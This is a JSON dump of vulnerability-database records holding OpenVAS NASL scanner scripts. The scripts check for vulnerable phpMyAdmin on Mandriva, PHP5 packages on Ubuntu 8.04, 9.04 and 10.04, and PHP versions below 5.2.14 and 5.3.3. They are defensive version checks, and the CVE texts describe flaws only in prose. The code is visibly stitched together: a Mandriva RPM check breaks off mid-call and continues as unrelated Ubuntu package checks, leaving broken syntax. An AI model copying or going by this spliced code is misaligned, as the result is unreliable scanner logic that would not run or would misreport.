superglobal array (CVE-2011-2507).\n\n Directory traversal vulnerability in libraries/display_tbl.lib.php\n in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1, when\n a certain MIME transformation feature is enabled, allows remote\n authenticated users to include and execute arbitrary local files\n via a .. 
(dot dot) in a GLOBALS[mime_map][->name][transformation]\n parameter (CVE-2011-2508).\n\n Multiple cross-site scripting (XSS) vulnerabilities in the table Print\n view implementation in tbl_printview.php in phpMyAdmin before 3.3.10.3\n and 3.4.x before 3.4.3.2 allow remote authenticated users to inject\n arbitrary web script or HTML via a crafted table name (CVE-2011-2642).\n\n Directory traversal vulnerability in sql.php in phpMyAdmin 3.4.x before\n 3.4.3.2, when configuration storage is enabled, allows remote attackers\n to include and execute arbitrary local files via directory traversal\n sequences in a MIME-type transformation parameter (CVE-2011-2643).\n\n Multiple directory traversal vulnerabilities in the relational\n schema implementation in phpMyAdmin 3.4.x before 3.4.3.2 allow remote\n authenticated users to include and execute arbitrary local files via\n directory traversal sequences in an export type field, related to\n (1) libraries/schema/User_Schema.class.php and (2) schema_export.php\n (CVE-2011-2718).\n\n libraries/auth/swekey/swekey.auth.lib ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpmyadmin\", rpm:\"phpmyadmin~3.4.3.2~0.1mdvmes5.2\", rls:\"MNDK_mes5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:55:56", "description": "Check for the Version of phpmyadmin", "cvss3": {}, "published": "2011-08-18T00:00:00", "type": "openvas", "title": 
"Mandriva Update for phpmyadmin MDVSA-2011:124 (phpmyadmin)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2508", "CVE-2011-2642", "CVE-2011-2505", "CVE-2011-2718", "CVE-2011-2643", "CVE-2011-2506", "CVE-2011-2719", "CVE-2011-2507"], "modified": "2017-07-06T00:00:00", "id": "OPENVAS:831441", "href": "http://plugins.openvas.org/nasl.php?oid=831441", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mandriva Update for phpmyadmin MDVSA-2011:124 (phpmyadmin)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities has been discovered and corrected in\n phpmyadmin:\n\n libraries/auth/swekey/swekey.auth.lib.php in the Swekey authentication\n feature in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1\n assigns values to arbitrary parameters referenced in the query string,\n which allows remote attackers to modify the SESSION superglobal array\n via a crafted request, related to a remote variable manipulation\n vulnerability. 
(CVE-2011-2505).\n \n setup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2\n and 3.4.x before 3.4.3.1 does not properly restrict the presence of\n comment closing delimiters, which allows remote attackers to conduct\n static code injection attacks by leveraging the ability to modify\n the SESSION superglobal array (CVE-2011-2506).\n \n libraries/server_synchronize.lib.php in the Synchronize implementation\n in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 does not\n properly quote regular expressions, which allows remote authenticated\n users to inject a PCRE e (aka PREG_REPLACE_EVAL) modifier, and\n consequently execute arbitrary PHP code, by leveraging the ability\n to modify the SESSION superglobal array (CVE-2011-2507).\n \n Directory traversal vulnerability in libraries/display_tbl.lib.php\n in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1, when\n a certain MIME transformation feature is enabled, allows remote\n authenticated users to include and execute arbitrary local files\n via a .. 
(dot dot) in a GLOBALS[mime_map][-&gt;name][transformation]\n parameter (CVE-2011-2508).\n \n Multiple cross-site scripting (XSS) vulnerabilities in the table Print\n view implementation in tbl_printview.php in phpMyAdmin before 3.3.10.3\n and 3.4.x before 3.4.3.2 allow remote authenticated users to inject\n arbitrary web script or HTML via a crafted table name (CVE-2011-2642).\n \n Directory traversal vulnerability in sql.php in phpMyAdmin 3.4.x before\n 3.4.3.2, when configuration storage is enabled, allows remote attackers\n to include and execute arbitrary local files via directory traversal\n sequences in a MIME-type transformation parameter (CVE-2011-2643).\n \n Multiple directory traversal vulnerabilities in the relational\n schema implementation in phpMyAdmin 3.4.x before 3.4.3.2 allow remote\n authenticated users to include and execute arbitrary local files via\n directory traversal sequences in an export type field, related to\n (1) libraries/schema/User_Schema.class.php and (2) schema_export.php\n (CVE-2011-2718).\n \n libraries/auth/swekey/swekey.auth.lib ... 
\n\n Description truncated, for more information please check the Reference URL\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"phpmyadmin on Mandriva Enterprise Server 5,\n Mandriva Enterprise Server 5/X86_64\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.mandriva.com/security-announce/2011-08/msg00006.php\");\n script_id(831441);\n script_version(\"$Revision: 6565 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 14:56:06 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-18 14:57:45 +0200 (Thu, 18 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"MDVSA\", value: \"2011:124\");\n script_cve_id(\"CVE-2011-2505\", \"CVE-2011-2506\", \"CVE-2011-2507\", \"CVE-2011-2508\", \"CVE-2011-2642\", \"CVE-2011-2643\", \"CVE-2011-2718\", \"CVE-2011-2719\");\n script_name(\"Mandriva Update for phpmyadmin MDVSA-2011:124 (phpmyadmin)\");\n\n script_summary(\"Check for the Version of phpmyadmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/release\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"MNDK_mes5\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpmyadmin\", rpm:\"phpmyadmin~3.4.3.2~0.1mdvmes5.2\", 
isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n 
}\n\n if ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.3.2-1ubuntu4.5\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = 
isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.6.dfsg.1-3ubuntu4.6\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n 
exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mhash\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.2.4-2ubuntu5.12\", 
rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"php5\", ver:\"5.2.4-2ubuntu5.12\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:32:03", "description": "PHP version smaller than 5.2.14 suffers from multiple vulnerabilities.", "cvss3": {}, "published": "2012-06-21T00:00:00", "type": "openvas", "title": 
"PHP Version < 5.2.14 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2225", "CVE-2010-2484", "CVE-2010-2097", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-2191", "CVE-2007-1581", "CVE-2010-2190", "CVE-2010-2101", "CVE-2010-1860", "CVE-2010-2100", "CVE-2010-1864", "CVE-2010-1862", "CVE-2010-0397"], "modified": "2018-07-09T00:00:00", "id": "OPENVAS:1361412562310110171", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310110171", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: nopsec_php_5_2_14.nasl 10460 2018-07-09 07:50:03Z cfischer $\n#\n# PHP Version < 5.2.14 Multiple Vulnerabilities\n#\n# Authors:\n# Songhan Yu <syu@nopsec.com>\n#\n# Copyright:\n# Copyright NopSec Inc. 2012, http://www.nopsec.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.110171\");\n script_version(\"$Revision: 10460 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-09 09:50:03 +0200 (Mon, 09 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-21 11:43:12 +0100 (Thu, 21 Jun 2012)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2007-1581\", \"CVE-2010-0397\", \"CVE-2010-1860\", \"CVE-2010-1862\", \"CVE-2010-1864\",\n \"CVE-2010-2097\", \"CVE-2010-2100\", \"CVE-2010-2101\", \"CVE-2010-2190\", \"CVE-2010-2191\",\n \"CVE-2010-2225\", \"CVE-2010-2484\", \"CVE-2010-2531\", \"CVE-2010-3065\");\n script_bugtraq_id(38708, 40948, 41991);\n script_name(\"PHP Version < 5.2.14 Multiple Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright NopSec Inc. 2012\");\n script_dependencies(\"gb_php_detect.nasl\");\n script_mandatory_keys(\"php/installed\");\n\n script_tag(name:\"solution\", value:\"Update PHP to version 5.2.14 or later.\");\n\n script_tag(name:\"summary\", value:\"PHP version smaller than 5.2.14 suffers from multiple vulnerabilities.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) ) exit( 0 );\nif( ! 
vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less( version:vers, test_version:\"5.2.14\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"5.2.14\" );\n security_message( data:report, port:port );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:03", "description": "PHP version smaller than 5.3.3 suffers from multiple vulnerabilities.", "cvss3": {}, "published": "2012-06-21T00:00:00", "type": "openvas", "title": "PHP Version < 5.3.3 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2225", "CVE-2010-2484", "CVE-2010-2097", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-2191", "CVE-2007-1581", "CVE-2010-2190", "CVE-2010-3063", "CVE-2010-2101", "CVE-2010-3062", "CVE-2010-1860", "CVE-2010-3064", "CVE-2010-2100", "CVE-2010-1917", "CVE-2010-1864", "CVE-2010-1862", "CVE-2010-0397"], "modified": "2018-07-09T00:00:00", "id": "OPENVAS:1361412562310110182", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310110182", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: nopsec_php_5_3_3.nasl 10460 2018-07-09 07:50:03Z cfischer $\n#\n# PHP Version < 5.3.3 Multiple Vulnerabilities\n#\n# Authors:\n# Songhan Yu <syu@nopsec.com>\n#\n# Copyright:\n# Copyright NopSec Inc. 2012, http://www.nopsec.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:php:php\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.110182\");\n script_version(\"$Revision: 10460 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-09 09:50:03 +0200 (Mon, 09 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-21 11:43:12 +0100 (Thu, 21 Jun 2012)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2007-1581\", \"CVE-2010-0397\", \"CVE-2010-1860\", \"CVE-2010-1862\",\n \"CVE-2010-1864\", \"CVE-2010-1917\", \"CVE-2010-2097\", \"CVE-2010-2100\",\n \"CVE-2010-2101\", \"CVE-2010-2190\", \"CVE-2010-2191\", \"CVE-2010-2225\",\n \"CVE-2010-2484\", \"CVE-2010-2531\", \"CVE-2010-3062\", 